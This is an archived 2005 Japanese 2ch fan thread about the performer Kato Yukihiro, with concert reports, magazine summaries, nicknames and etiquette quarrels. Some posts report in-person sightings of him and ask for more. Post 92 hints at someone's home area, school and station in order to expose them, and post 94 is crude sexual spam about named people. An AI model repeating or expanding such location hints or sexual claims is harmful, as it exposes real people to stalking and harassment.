5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◎★☆いいんじゃないの!?加藤幸宏 5☆★◎

1 :〜手を広げていればそれは加藤幸宏〜 :2005/05/23(月) 10:59:38
ぶっきらぼうな上に不器用顔はおっさんだけど笑顔はややか○いい眉毛太かった身体細かった
マンガ好きゲームも大好き18歳入所6年6ヶ月ターンは手を広げて腕輪は忘れずにからあげが好き
飼い犬の名はサム一匹狼風味目のわきにほくろちょっぴり人見知りエロ目映り込みは笑顔でカメラ目線
衣装ははだけ気味 腕まくり必須歌口ずさんでるけど歌詞メチャクチャ馬車馬なのに名鑑載らない
ご機嫌お疲れの差は激しい中身の反抗期終了外見の反抗期開始着ぐるみなら任せろ
フリーダンスはごきげんオレ紺得意技は出とちり衣装早替えとローラー苦手なんじゃないの!?ウナムー

前スレ ◎★☆いいんじゃないの!?加藤幸宏 4☆★◎
http://tv7.2ch.net/test/read.cgi/jr/1092987504/l50


2 :名無しさん@お腹いっぱい。:2005/05/23(月) 11:00:03
過去ログ
◎★☆いいんじゃないの!?加藤幸宏☆★◎
1. http://tv2.2ch.net/jr/kako/994/994053185.html
2. http://tv2.2ch.net/test/read.cgi/jr/1049379765/
3. http://music4.2ch.net/test/read.cgi/jr/1069171956/


3 :名無しさん@お腹いっぱい。:2005/05/23(月) 11:04:07
>1
乙なんじゃないの!?

4 :名無しさん@お腹いっぱい。:2005/05/23(月) 11:11:55
新スレでのびのび書き込めて嬉スィんじゃないの!?ジブン


5 :名無しさん@お腹いっぱい。:2005/05/23(月) 11:15:42
昨日の2部は気合い入りまくりダンスだったんじゃないの!?ウナムー

6 :名無しさん@お腹いっぱい。:2005/05/23(月) 11:16:47
風の中〜でわらゑと衝突してコケタ時は一瞬ヒヤッとしたんじゃないの!?ウナムー

7 :名無しさん@お腹いっぱい。:2005/05/23(月) 11:19:53
ワンデイで毎度滝に構ってもらってオーラスではタイミング合わなくてスルーかと思いきや
滝が慌てて戻ってきて構ってくれたのにはチョト感動でワラタんじゃないの!?ウナムー

8 :名無しさん@お腹いっぱい。:2005/05/23(月) 12:00:02
左耳だけに髪をかけて枝チャソとお揃いみたいだったのはなにがしたかったのか
イマイチわからなかったんじゃないの!?ウナムー

9 :名無しさん@お腹いっぱい。:2005/05/23(月) 16:00:07
Jr板のほうはあのまま放置するのか決めたほうがいいんじゃないの!?ウナムー担

10 :名無しさん@お腹いっぱい。:2005/05/23(月) 16:44:07
それは埋めるとかそういう話なのか聞きたいんじゃないの!?>9タソ

11 :名無しさん@お腹いっぱい。:2005/05/23(月) 16:59:39
>9だけどここ住人なら専ブラ入れてるだろうから落ちても問題ないだろうけど
厨レスで埋まるのも何だからさっさと埋めたほうがいいかとオモタんじゃないの!?>10タン

12 :名無しさん@お腹いっぱい。:2005/05/23(月) 17:23:02
ご配慮ありがdじゃないの!?>11タソ

13 :名無しさん@お腹いっぱい。:2005/05/23(月) 18:25:01
ウナムーって加藤くんのことですよね?
足の飯田くんと加藤くんが渋谷区のあるコンビニにいたのを見たのですが
加藤くんが飯田くんにウェンディってよばれてたので気になったんですけどウナムーってあだ名はウェンディが由来なんですか?
教えてください!
飯田くんはチェンって呼ばれてるのかと思ったらキョンピーって呼ばれてたんですけどそう呼ぶのは加藤くんだけですか?

14 :名無しさん@お腹いっぱい。:2005/05/23(月) 18:42:34
ウナムーの由来は幸宏の「宏」をカタカナで呼んだんじゃないの!?>13タン
ウェンディは私は初耳!知ってる人いたら教えてほしいんじゃないの!?>ウナムー

15 :名無しさん@お腹いっぱい。:2005/05/23(月) 18:54:31
とりあえず春ツアー終了乙なんじゃないの!?ウナムー
この春で新規ヲタ獲得オメなんじゃないの!?ウナムー

16 :名無しさん@お腹いっぱい。:2005/05/23(月) 20:02:02
ウェンディってピーターパンのキャラなんじゃないの!?ウナムー

17 :名無しさん@お腹いっぱい。:2005/05/23(月) 20:03:39
ウェンディよりピーターパンになりたかったんじゃないの!?ウナムー

18 :名無しさん@お腹いっぱい。:2005/05/23(月) 20:30:43
ピターパンの正体はゆにらなんじゃないの!?ウナムー

19 :名無しさん@お腹いっぱい。:2005/05/23(月) 20:43:31
眠っていたウナムーを窓から連れ出してくれるんじゃないの!?ゆにら
そしてふたりはネバーランドへ旅立っちゃうんじゃないの!?ウナムー

20 :名無しさん@お腹いっぱい。:2005/05/23(月) 20:48:59
夏の仕事が気になるんじゃないの!?ウナムー

21 :名無しさん@お腹いっぱい。:2005/05/23(月) 21:21:33
滝つ合コンを越える仕事に出会えるといいんじゃないの!?ウナムー

22 :名無しさん@お腹いっぱい。:2005/05/23(月) 21:28:28
ネバーランドに連れてってほしいんじゃないの!?ウナムー

23 :名無しさん@お腹いっぱい。:2005/05/23(月) 22:46:11
オムとニコニコカケッコキャ●スだったんじゃないの!?ウナムー

24 :名無しさん@お腹いっぱい。:2005/05/24(火) 07:20:16
紺時期に体調崩すパターン多過ぎなんじゃないの?!ウナムー

25 :名無しさん@お腹いっぱい。:2005/05/24(火) 18:49:23
体調崩してたのか気になるんじゃないの!?ウナムー

26 :ユーが名無しネ:2005/05/24(火) 21:48:32
24タソじゃないけど
なんだか風邪気味だったらしいんじゃないの!?25タソ

27 :ユーが名無しネ:2005/05/25(水) 02:07:18
ウェンディの風邪うつしてもらいたいんじゃないの!?ウナムー

28 :ユーが名無しネ:2005/05/25(水) 02:07:54
27キモスだよ27なんじゃないの!?ウナムー

29 :ユーが名無しネ:2005/05/25(水) 02:09:18
同意だけど時事ネタだと思って続かなければ見逃してあげればいいんじゃないの!?>28

30 :ユーが名無しネ:2005/05/25(水) 02:12:32
28タソじゃないけど結構続いてた気がするんじゃないの!?>29タソ
せっかくIDなしに戻ったのにキモスレ化は嫌なんじゃないの!?ウナムー

31 :ユーが名無しネ:2005/05/25(水) 02:15:09
22とか27みたいなウナに何かして欲しい系のレスはテメェのブログにでも
書きやがれなんじゃないの!?花畑ウナ担

32 :ユーが名無しネ:2005/05/25(水) 02:21:06
厨へのレスは厨を呼ぶんじゃないの!?31

33 :ユーが名無しネ:2005/05/25(水) 02:26:51
30タソでも31タソでも無いけど
花畑レスは厨というよりばあやなんじゃないの!?ウナムースレ

34 :ユーが名無しネ:2005/05/25(水) 02:29:18
ばあやがゆにらとのなかよしこよしウフ派生ネタで遊ぶわけないんじゃないの!?ウナムー

35 :ユーが名無しネ:2005/05/25(水) 02:31:56
悪いことは全部ばあやのせいが共存平和条約なんじゃないの!?ばあや
とも思うけどそろそろ換気が必要だったんじゃないの!?ウナムースレ

36 :ユーが名無しネ:2005/05/25(水) 02:34:03
もうこれで換気終了次の話題でいいんじゃないの!?ウナムースレ

37 :ユーが名無しネ:2005/05/25(水) 07:21:45
ウナムーに今朝も会えた自分は幸せなんじゃないの!?自分
だけどウナムーがチャリ磨いてる姿はあんまりみたくなかったんじゃないの!?ウナムー

38 :ユーが名無しネ:2005/05/25(水) 08:30:59
いいんじゃないの!?庶民的
とっても裏山なんじゃないの!?>37

39 :ユーが名無しネ:2005/05/25(水) 12:12:24
服装がどんなだったか気になるんじゃないの!?>37

40 :ユーが名無しネ:2005/05/25(水) 12:16:54
タンクトップに下は制服だったんじゃないの!?39タソ

41 :ユーが名無しネ:2005/05/25(水) 13:50:18
下制服でも上はタンクトップなとこがウナムーらしいんじゃないの!?>ウナムー
きっと髪はボサだったんじゃないの!?>ウナムー
教えてくれてありがとう&また見かけたら教えてほしいんじゃないの!?>37タン

42 :ユーが名無しネ:2005/05/25(水) 15:55:59
>41
とりあえず半年ロムってsageてから書きこめなんじゃないの!?緑

43 :ユーが名無しネ:2005/05/26(木) 00:28:31
ずいぶん朝早くからチャリ磨いてるんじゃないの!?ウナムー
朝からタンクトップって本当に風邪気味なの!?ウナムー

44 :ユーが名無しネ:2005/05/26(木) 00:32:57
流石にもう治ったんじゃないの!?ウナムー

45 :ユーが名無しネ:2005/05/27(金) 14:48:21
定期貼り付け
・厨ご用達の小さい「ぁぃぅぇぉ」は禁止
・なるべく深山を臭わせない
・空気を読んでばあやないしウナ担に混じる
・分らない話には無理に乗らない
・レスする前にスレの傾向を半年とは言わずとも一ヶ月は勉強する事
・他スレでウナマンセー発言をして迷惑を掛けない

46 :ユーが名無しネ:2005/05/28(土) 22:16:26
出番が気になるんじゃないの!?ウナムー
少しは増えることを期待しちゃうんじゃないの!?ウナムー

47 :ユーが名無しネ:2005/05/29(日) 19:29:06
とっても応援しがいのある扱いに逆戻りなんじゃないの!?ウナムー
でもやっぱりダンスに気合い入ってて素晴らしかったんじゃないの!?ウナムー

48 :ユーが名無しネ:2005/05/29(日) 20:42:13
てことは3月の時と同じくらいの出番だったの!?ウナムー

49 :ユーが名無しネ:2005/05/29(日) 23:37:55
殺陣シーンは人数減ったぶんおいしかったんじゃないの!?ウナムー
ただぴっちり帽は誰一人としてビミョンだったんじゃないの!?ウナムー

50 :ユーが名無しネ:2005/05/30(月) 00:14:07
3月とほぼ同じ紺だからしょうがないんじゃないの!?>48タソ
だけど3月よりは出番増えてる気がするんじゃないの!?ウナムー

51 :ユーが名無しネ:2005/05/30(月) 00:43:48
3月は前半全然でてなかった気がしたんだが
今日はメドレーみたいなのずっと出てたが増えたのかどうか3月の記憶が
曖昧でよくわからないんじゃないの!?ウナムー

52 :ユーが名無しネ:2005/05/30(月) 10:51:14
確か、メドレー数曲と殺陣が増えてたんじゃないの!?ウナムー
でも3月よりやる気があるように見えたし、
お手振りも丁寧にやってたし嬉しかったんじゃないの!?ウナムー担

53 :ユーが名無しネ:2005/05/30(月) 11:41:05
そんな中スルーされた自分は悲しいんじゃないの!?ウナムー
出番は増えたけど先月の魚介@石鹸紺よりは
うちわの数は少なかったんじゃないの!?ウナムー担

54 :ユーが名無しネ:2005/05/30(月) 13:56:50
大丈夫、自分もスルーされたんじゃないの!?53タソ
自分のうちわより他のうちわにお手振り丁寧だったんじゃないの!?ウナムー

55 :ユーが名無しネ:2005/05/30(月) 15:05:32
緑いいかげんにしろやゴルァ!!なんじゃないの!?ウナムー

56 :ユーが名無しネ:2005/05/30(月) 15:38:06
他担だけどランニング姿の二の腕にドキムネしちゃったんじゃないの!?ウナムー
ぴっちり帽のてっぺんのトンガリ加減もドングリみたいで(*´∀`)だったんじゃないの!?ウナムー
青い帽子もぴっちりしてたんじゃないの!?ウナムー
なんだか自分このまま降りそうな勢いなんじゃないの!?ウナムー

57 :ユーが名無しネ:2005/05/30(月) 16:33:36
自分52緑だけど、54タソとは別人なんだけど、何で数人緑になるのか疑問なんじゃないの!??ウナムー
そのままの勢いで降りちゃってほしいんじゃないの!?56タソ

58 :ユーが名無しネ:2005/05/30(月) 16:40:36
緑ってわかってるならsageて欲しいんじゃないの!?57タソ
心中お察ししますじゃないの!?ウナムー担

59 :ユーが名無しネ:2005/05/30(月) 16:57:02
ここまでの深山も珍しいんじゃないの!?ウナムー

60 :ユーが名無しネ:2005/05/30(月) 17:44:02
自分もスルーされたからスルーされてこそウナムー担ってことにしとけばいいんじゃないの!?ウナムー担
それにしても石鹸紺がいま思えばキモチワルイほどお手フリ満載だったんじゃないの!?ウナムー

61 :ユーが名無しネ:2005/05/30(月) 18:22:23
そういえばあの変な投げチッスもなかったのか気になるんじゃないの!?ウナムー


62 :ユーが名無しネ:2005/05/30(月) 19:54:18
グーしてナゲチューするやつならやってんじゃないの!?>61タソ


63 :ユーは名無しネ:2005/05/30(月) 20:24:50
昨日投げチューしてるの見なかったけど、やってる時もあったのね!?>62タソ

64 :ユーが名無しネ:2005/05/30(月) 20:28:01
自分みたかぎり1回やってたんじゃないの!?>63タソ

65 :ユーが名無しネ:2005/05/30(月) 21:16:29
とりあえず半年ロムってないヤシはすっこんでろなんじゃないの!?ウナムー

66 :ユーが名無しネ:2005/05/30(月) 23:08:44
厨人気増えるのは別にいいけどスレに厨はイラネなんじゃないの!?ウナムー

67 :ユーが名無しネ:2005/05/30(月) 23:25:32
お約束だがおまいもななんじゃないの!?65タソ

68 :ユーが名無しネ:2005/05/30(月) 23:28:52
お手振り話の時点で(ryじゃないの!?ウナムー

69 :ユーが名無しネ:2005/05/31(火) 01:38:51
>67
orzなんじゃないの!?67タソ
68タソ連れてしばらくすっこんでるんじゃないの!?ウナムー

70 :ユーは名無しネ:2005/05/31(火) 02:00:41
65がすっこんでた方がいいんじゃないの!?ウナムー
自分、63だが、「昨日」って前置きしてんじゃないの!?ウナムー
魚介の時、禿機嫌悪く、自分ウチワはスルーしまくって、
投げチューしてない様子だったから、確認したかっただけじゃないの!?ウナムー

71 :ユーが名無しネ:2005/05/31(火) 02:13:13
勘違いしてキレないでホスィんじゃないの!?70タソ
多分>63タソはアゲ厨のこといってるんじゃないの!?ウナムー
厨が蔓延りすぎでビクーリなんじゃないの!?ウナムースレ

72 :ユーが名無しネ:2005/05/31(火) 02:54:05
ばあや63=70に消臭剤を

73 :ユーが名無しネ:2005/05/31(火) 03:01:17
( ・_・)r鹵~~~~ 63=70

74 :ユーが名無しネ:2005/05/31(火) 06:18:58
まぁムキにならず流してるときのウナムーダンスみたいに適当にやればいいんじゃないの!?ウナムー

75 :ユーが名無しネ:2005/05/31(火) 09:38:40
魚介ではスルーされたけどしつこく横蟻にも逝けばいいんじゃないの!?ウナムー担

76 :ユーが名無しネ:2005/05/31(火) 11:37:20
ヲバに全ステしてくれって日程だし言われるまでもないんじゃないの!?>75タン

77 :ユーが名無しネ:2005/05/31(火) 14:55:30
75だが
d!なんじゃないの!?>76タソ
もちろん自分も全ステなんだからいいんじゃないの!?ウナムー


78 :ユーが名無しネ:2005/05/31(火) 23:10:07
77が鏝な件について。
自分語りはブログでやれなんじゃないの!?77

79 :ユーが名無しネ:2005/05/31(火) 23:15:03
前は全捨て話わざわざするようなスレじゃなかったんじゃないの!?ウナムースレ
ばあやにとっては当たり前の事だもんねーばあやー

80 :ユーが名無しネ:2005/05/31(火) 23:21:41
ばあやマンセースレでもなかったんじゃないの!?ウナムー
いつからこんな馴れ合いスレになったの!?ウナムー

81 :ユーが名無しネ:2005/05/31(火) 23:24:34
カツン紺の見所を少ないなりに教えて欲しいんじゃないの!?ウナムー

82 :ユーが名無しネ:2005/05/31(火) 23:25:46
次の話題が触れないんだったらレスしないでいいんじゃないの!?住人
XTC残したかったんじゃないの!?ウナムー

83 :ユーが名無しネ:2005/05/31(火) 23:27:37
XTC映ってなくて残念だったんじゃないの!?ウナムー

84 :ユーが名無しネ:2005/06/01(水) 06:17:33
カツン紺はフィールイットに尽きるんじゃないの!?ウナムー


85 :ユーが名無しネ:2005/06/01(水) 09:43:32
自治ヲバが五月蝿いんじゃないの!?>78-80
深山くらいスルーしてやれよなんじゃないの!?住人

86 :ユーが名無しネ:2005/06/01(水) 20:05:05
終わった話むしかえすなよあげ

87 :ユーが名無しネ:2005/06/01(水) 20:59:04
髪ペターリしすぎなんじゃないの!?ウナムー

88 :ユーが名無しネ:2005/06/01(水) 21:23:32
今日は写りこみサパーリなくて物足りなかったんじゃないの!?ウナムー

89 :ユーが名無しネ:2005/06/04(土) 21:00:21
二の腕凄かったんじゃないの!?ウナムー
明らかに他のズニアと違うんだけど

90 :ユーが名無しネ:2005/06/04(土) 21:46:48
そうかな一時期よりマシになったと思うんじゃないの!?ウナムー

91 :ユーが名無しネ:2005/06/04(土) 22:35:19
後半…前髪ぺったり耳かけセンター分け
その上、眉毛が薄く見えてワロタんじゃないの!?ウナムー

…ソレどうなの!?ウナムー

92 :ユーが名無しネ:2005/06/04(土) 22:43:18
ブナピー
神奈川県
偏差値42くらい
超ご満悦な駅が最寄り
晒しちゃうんじゃないの!?ブナピー
あー痩せなきゃ高校
あー痩せなきゃ市在住


93 :ユーが名無しネ:2005/06/04(土) 22:58:28
うちわが巨大化してきてて怖かったんじゃないの!?ウナムー
age厨もいたしなんだか恥ずかしかったんじゃないの!?ウナムー

94 :ユーが名無しネ:2005/06/04(土) 23:02:33
れぇなとスックン毎晩くちゅくちゅズコバコですわ☆
ウナムーごめんね☆
れぇなとスックン毎晩くちゅくちゅズコバコですわ☆
ウナムーごめんね☆

95 :ユーが名無しネ:2005/06/04(土) 23:08:37
ケロケロ(・∀・)宮田

96 :ユーが名無しネ:2005/06/04(土) 23:51:28
レェナ壊れた

97 :ユーが名無しネ:2005/06/05(日) 10:16:20
昨日は手抜きが目立ったんだじゃないの!?ウナムー

98 :ユーが名無しネ:2005/06/05(日) 11:40:57
客満載だけど
普通にがんがってたほうだと思うのは自分だけなのか聞きたいんじゃないの!?ウナム-

99 :ユーが名無しネ:2005/06/05(日) 22:57:49
蝉と並んで踊ってたとき、踊りが対照的で笑っちゃってゴメンなんじゃないの!?ウナムー

100 :ユーが名無しネ:2005/06/06(月) 19:36:34
片目誌の滝つ紺のページにちゃっかり横顔写ってるんじゃないの!?ウナムー

101 :ユーが名無しネ:2005/06/06(月) 20:03:02
箱根話が気になって早く雑誌がみたいんじゃないの!?ウナムー

102 :ユーが名無しネ:2005/06/06(月) 20:20:36
自分も禿気になるんじゃないの!?箱根話
そして名前がどんな風に載ったのかも気になるところなんじゃないの!?ウナムー

103 :ユーが名無しネ:2005/06/06(月) 20:54:15
こんなときばかりは関西人になりたいんじゃないの!?ウナムー

104 :ユーが名無しネ:2005/06/06(月) 21:44:44
ネタバレ良ければ書きましょうかなんじゃないの!?ウナムー担

105 :ユーが名無しネ:2005/06/06(月) 22:03:18
ぜひおながいしたいんじゃないの?!104タソ

106 :ユーが名無しネ:2005/06/06(月) 22:40:38
d誌
ホテルでゑ様ゆにらチャンウナでカードゲームして
三回負けたら罰ゲームでホームシックになったって設定で母親に電話するらスィ
結果はゑ様の負け
その後滝つコン前の休み話になりミッフィー抜きの足KTで箱根温泉に行き
美女が「ジャニーズ5人です」って言って芸能人のサインが沢山書いてるところに
足のサインも加えようとしたが店員から頼まれなかった
小さい風呂に美女とウナが寄り添いながら入ってたらスィ

片目誌は足スレに落ちてるのでドゾー
あと滝つコンのページに滝と手を取り合って嬉しそうなウナがいた
インナー黒上着紫なんだが何の曲だか自分はわからんorz

長文な上にこんな日本語不自由なレポでスマソなんじゃないの!?ウナムー担
個人的にゑ様ゆにらが幸宏呼びで(*´∀`)モエスだったんじゃないの!?ウナムー

107 :ユーが名無しネ:2005/06/06(月) 23:16:44
片目誌のはワンデイなんじゃないの!?106タソ
毎回絡んでたところなんじゃないの!?ウナムー

108 :ユーが名無しネ:2005/06/07(火) 00:08:20
ワンデイ絡みはほんと毎度楽しみだったんじゃないの!?ウナムー

109 :ユーが名無しネ:2005/06/07(火) 03:18:19
106タソテラモエスなんじゃないの!?ウナムー

110 :ユーが名無しネ:2005/06/08(水) 19:43:44
4日横蟻付近でウナムーのソロポスター売ってたって本当なの!?ウナムー

111 :ユーが名無しネ:2005/06/08(水) 20:13:10
こういう時はどういう対処すればいいのかとまどうんじゃないの!?ウナムー

112 :ユーが名無しネ:2005/06/08(水) 20:48:50
ゴメソ110だけど
あまりにビックリしてsage忘れてしまったorz

113 :ユーが名無しネ:2005/06/08(水) 21:30:58
少倉…レイニーの「大」傘クルクルだくなんて
あんまりじゃないの?!ウナムー

114 :ユーが名無しネ:2005/06/08(水) 22:00:03
あんまりすぎて笑うしかないんじゃないの!?ウナムー

115 :ユーが名無しネ:2005/06/08(水) 22:17:04
あれだけの出番でよく呼ばれたなと変に感心してしまったんじゃないの!?ウナムー

116 :ユーが名無しネ:2005/06/09(木) 22:32:03
夏決まってよかった♪

117 :ユーが名無しネ:2005/06/10(金) 17:59:30
おまいうるさいお

ここ2・3ヶ月の扱いでウマーと思ってたら
よけい_| ̄|○なんじゃないの…ウナムー…

118 :ユーが名無しネ:2005/06/10(金) 18:30:41
石鹸から滝つへの機嫌良さと同じ流れと感じたんじゃないの!?ウナムー
良いから微妙へなんじゃないの!?ウナムー

119 :ユーが名無しネ:2005/06/10(金) 22:59:39
山あり谷ありそれもまた人生なんじゃないの!?ウナムー

120 :ユーが名無しネ:2005/06/11(土) 00:45:01
このアプダウンこそ無所ならではの醍醐味なんじゃないの!?ウナムー

121 :ユーが名無しネ:2005/06/11(土) 14:01:47
別に嬉しくはないけど想像の範囲内だし夏にいい仕事貰えるといいなと思うだけなんじゃないの!?ウナムー

122 :ユーが名無しネ:2005/06/12(日) 01:47:40
流行の言葉使うんなら間違えない方がいいんじゃないの!?121タン

123 :ユーが名無しネ:2005/06/12(日) 14:41:50
爺ソロマンセーじゃないの!?ウナムー

124 :ユーが名無しネ:2005/06/12(日) 15:46:39
>122タソ
流行り言葉使ったつもりないけどどれが流行ってるのか教えてホスィんじゃないの!?122タソ

125 :ユーが名無しネ:2005/06/12(日) 16:00:30
http://that3.2ch.net/test/read.cgi/gline/1110282224/l50

いいんじゃないの!?流行にはいまいち乗り切れないウナムーとウナムスレ住人

126 :ユーが名無しネ:2005/06/12(日) 17:39:00
スレとは関係ない細かい事までつつく自治ヲバはいらないんじゃないの!?ウナムー

127 :ユーが名無しネ:2005/06/12(日) 22:07:33
鑢番組のライブステージを見返してたらウナムーに担降りしちゃったんじゃないの!?
テラカッコヨスなんじゃないの!?ウナムー

128 :ユーが名無しネ:2005/06/12(日) 22:58:34
2部のズニア紹介で足ひとりひとりの名前をカツンがサラッと言ったとき
ウナムーまでも名字呼びで変な気分だったんじゃないの!?ウナムー

129 :ユーが名無しネ:2005/06/12(日) 23:00:53
128タソ、それはウナムーとチャンも紹介されたって事でしょうか?
詳しく聞かせて欲しいんじゃないの!?128タソ

130 :ユーが名無しネ:2005/06/12(日) 23:05:10
紹介されたってほどじゃなくて足が台にあがってるときに
目か誰かがマイクで適当に全員の名前言っただけで
自分は特に感動はしなかったんじゃないの!?129タソ

131 :ユーが名無しネ:2005/06/12(日) 23:06:21
dクスそうある事じゃないのでチョト嬉しかったんじゃないの!?130タソ

132 :ユーが名無しネ:2005/06/12(日) 23:10:20
まあ嬉しくないといったらウソなので喜んでおくんじゃないの!?ウナムー

133 :ユーが名無しネ:2005/06/13(月) 00:40:05
とりあえず今日のレポ

・爺ソロウマー(衣装は石鹸升ヒヨ曲と一緒)
・ごきげんうるわしゅう
・チャンにちょっかいだしてた
・ファイオーナイにズニアがつかなくなってた
・わらゑと笑顔で猛ダッシュではけていったときがあった
・ズニアコーナーは相変わらずKTのみ休憩時間

とりあえずダンスがんがってたからよかったんじゃないの!?ウナムー

134 :ユーが名無しネ:2005/06/13(月) 23:03:27
>133
・ファイオーナイにズニアがつかなくなってた

これすごくショックなんじゃないの!?その前後のシーセイドとアイライキはどうだったのか
分かったら教えてホチィんじゃないの!?133タソ

135 :ユーが名無しネ:2005/06/13(月) 23:17:12
>134
多分会場の都合だろうからたこやきでは復活してる気もする
シーセイドとアイライキは変わらずなんじゃないの!?134タソ

136 :ユーが名無しネ:2005/06/13(月) 23:33:03
どうでもいいけど正しくはシーセイドじゃなくてシーセッドなんじゃないの!?

137 :ユーが名無しネ:2005/06/14(火) 06:48:46
そんな指摘は笑われるからもうちょっとロムっとけばいいんじゃないの!?136タソ

138 :ユーが名無しネ:2005/06/16(木) 23:50:35
>135
ちょっと遅くなったけどありがdなんじゃないの!?>135タソ
たこやき楽しみなんじゃないの!?

139 :ユーが名無しネ:2005/06/17(金) 12:24:07
オリスタのカツン紺レポに写り込んでるんじゃないの!?ウナムー

140 :ユーが名無しネ:2005/06/17(金) 13:40:49
写り込みステキでコーフンしちゃったんじゃないの!?ウナムー

141 :ユーが名無しネ:2005/06/17(金) 22:48:36
明日いるよな?と毎回不安な紺前日を過ごしてる気がするんじゃないの!?ウナムー

142 :ユーが名無しネ:2005/06/18(土) 22:19:16
ネバアゲにも出てきてウマーだったんじゃないの!?ウナムー

143 :ユーが名無しネ:2005/06/18(土) 23:53:02
3月しうまい以来で見たけど出番増えててウマーじゃないの!?ウナムー

144 :ユーが名無しネ:2005/06/19(日) 21:47:15
3部のりのりだったんじゃないの!?ウナムー

145 :ユーが名無しネ:2005/06/19(日) 23:01:57
YO!YO!言いながら歩いてたんじゃないの!?ウナムー

146 :ユーが名無しネ:2005/06/20(月) 00:32:46
父さんやゆにらと何かにつけエアロビみたいな振りしてたけど流行ってるの!?ウナムー

147 :ユーが名無しネ:2005/06/20(月) 00:36:23
殺陣で目と目合わせてニヤニヤするわ父さんと最前の客にタッチしまくるわ
枝とすれ違いざまぶつかりそうになったとき腹にパンチ入れる振りするわ
たこやきオーラスは本当にゴキゲンだったんじゃないの!?ウナムー

148 :ユーが名無しネ:2005/06/20(月) 00:41:05
枝との絡みは自分も見ててワロタんじゃないの!?>147タン
ウナムーが殴る振りしたとき枝が微妙に怯えてたのがちと不憫だったけど
その後2人で笑い合ってたのがカ○イかったんじゃないの!?ウナムー&枝

149 :ユーが名無しネ:2005/06/20(月) 00:42:26
痩せたのは確かなんだけどタンクと足のいつもの青い衣装のときは
やっぱり腕の太さが1人だけ際立ってたんじゃないの!?ウナムー

150 :ユーが名無しネ:2005/06/20(月) 00:44:50
ネバアゲで立ち位置が最前列センターのときは得意げな顔だったんじゃないの!?ウナムー

151 :ユーが名無しネ:2005/06/20(月) 00:51:03
>149
近くにいるのがプラムのときでさえ1人だけ袖がパツパツで笑うしかなかったんじゃないの!?ウナムー

152 :ユーが名無しネ:2005/06/20(月) 00:53:16
あれ禿気になったんじゃないの!?>146
エアロビなの!?やけに楽しそうだったんじゃないの!?ウナムー

153 :ユーが名無しネ:2005/06/22(水) 17:39:10
実は足担に人気なんじゃないの!?ウナムー

154 :ユーが名無しネ:2005/06/22(水) 20:44:57
今日の衣装はまさにエアロビみたいだったんじゃないの!?ウナムー

155 :ユーが名無しネ:2005/06/22(水) 20:54:42
番組終わるまでは実況になるから気を付けて欲しいんじゃないの!?>154タソ

156 :ユーが名無しネ:2005/06/22(水) 21:12:02
ウナムー今日はおいしすぎたんじゃないの!?ウナムー

157 :ユーが名無しネ:2005/06/24(金) 23:51:24
バリボ布持ち乙なんじゃないの!?ウナムー

158 :ユーが名無しネ:2005/06/26(日) 15:52:26
腕輪はどこに忘れてきたの!?ウナムー

159 :ユーが名無しネ:2005/06/26(日) 17:26:26
本当に一重なの!?ウナムー
彫りが深くて全然一重に見えないんだけど

160 :ユーが名無しネ:2005/06/26(日) 19:00:02
オーラス壊れすぎで楽しすぎで乙なんじゃないの!?ウナムー

161 :ユーが名無しネ:2005/06/26(日) 20:31:54
ここの姐サンたち行ってる気もするが少しずつレポするんじゃないの!?ウナムー

162 :ユーが名無しネ:2005/06/26(日) 20:34:32
2部は前半から壊れ気味でやたら足上げてみたりしてた

面倒なのでレポはお約束なしで許して欲スィんじゃないの!?ミナサン

163 :ユーが名無しネ:2005/06/26(日) 20:59:28
最後お手フリででてくるときに足KTでメインステに1列に並んで
順番にバック転していった

164 :ユーが名無しネ:2005/06/26(日) 21:02:08
その後俺愛ソロの片手をあげてみんなで集合してヒラヒラさせるやつを
みんなでやってて後からでてきた宮tユニも笑顔で参加してた

165 :ユーが名無しネ:2005/06/26(日) 21:02:52
あとは宮tの真似してハイジャンプしてみたり

166 :ユーが名無しネ:2005/06/26(日) 21:05:46
殺陣で目に超能力で首絞められてるかんじダタ
離れてるのに操られてウナムーが自分で手を首にあててク、クルシイ…と絞めてたり

167 :ユーが名無しネ:2005/06/26(日) 21:06:24
1部2部とま足くくりでまた名前呼ばれてた

168 :ユーが名無しネ:2005/06/26(日) 21:29:46
レポ姐様アリガトンダイシテル!

169 :ユーが名無しネ:2005/06/26(日) 21:31:12
dなんじゃないの!?162-167タソ
165が特に気になったんじゃないの!?ウナムー

170 :ユーが名無しネ:2005/06/27(月) 00:35:11
>165タンじゃないけど終始壊れてた気がするんじゃないの!?>169タン
他にもプラムやゑとすれ違うときも相手のマネして盛り上がりまくりだったんじゃないの!?ウナムー
ノーマターで盛り上がりすぎて曲終わったとき寝転がってたりしてんじゃないの!?ウナムー

171 :ユーが名無しネ:2005/06/27(月) 00:37:55
>162
足上げはふざけてやってた割には垂直に上がっててレベル高かったんじゃないの!?ウナムー

172 :ユーが名無しネ:2005/06/27(月) 00:57:59
ノーマターで寝転んだあと跳ね起きたのも見所だったんじゃないの!?ウナムー

173 :ユーが名無しネ:2005/06/27(月) 06:17:48
足age自分もヴァカなことやってるなと思いつつ
キレイに足があがっててカコイイとか思っちゃったんじゃないの!?ウナムー

174 :ユーが名無しネ:2005/06/27(月) 06:29:22
アンコででてきたときも足KTで何かやりいんだけど何やったらいいかワカラナイ…みたいに
出てしばらくメインステうろうろして中々外周に行こうとしなかった6人が
愛しかったんじゃないの!?ウナムー

175 :ユーが名無しネ:2005/06/27(月) 06:29:37
アンコででてきたときも足KTで何かやりたいんだけど何やったらいいかワカラナイ…みたいに
出てしばらくメインステうろうろして中々外周に行こうとしなかった6人が
愛しかったんじゃないの!?ウナムー

176 :ユーが名無しネ:2005/06/27(月) 06:31:23
連投スマソ

とにかく乙なんじゃないの!?ウナムー

177 :ユーが名無しネ:2005/06/27(月) 06:36:30
すれ違いざまにゑとボクシングしたりまたゆにらとエアロビ?みたいな変なダンスやってたりゴキゲンだったんじゃないの!?ウナムー

178 :ユーが名無しネ:2005/06/27(月) 22:29:24
ttp://www.geocities.jp/dogcafejungle/page030.html
キャワいいんじゃないの!?サム

179 :ユーが名無しネ:2005/06/28(火) 00:32:08
>178
人相の悪さが誰かを彷彿とさせていいんじゃないの!?ウナムー

180 :ユーが名無しネ:2005/06/28(火) 11:58:01
ほんとにサムなのか気になるんじゃないの!?178タン

181 :ユーが名無しネ:2005/06/28(火) 22:07:41
みんなベルのこと忘れてるんじゃないの!?ウナムー

182 :ユーが名無しネ:2005/06/29(水) 17:55:29
ベルがなんのことかわからないから教えて欲スィんじゃないの!?ウナムー

183 :ユーが名無しネ:2005/06/29(水) 18:15:05
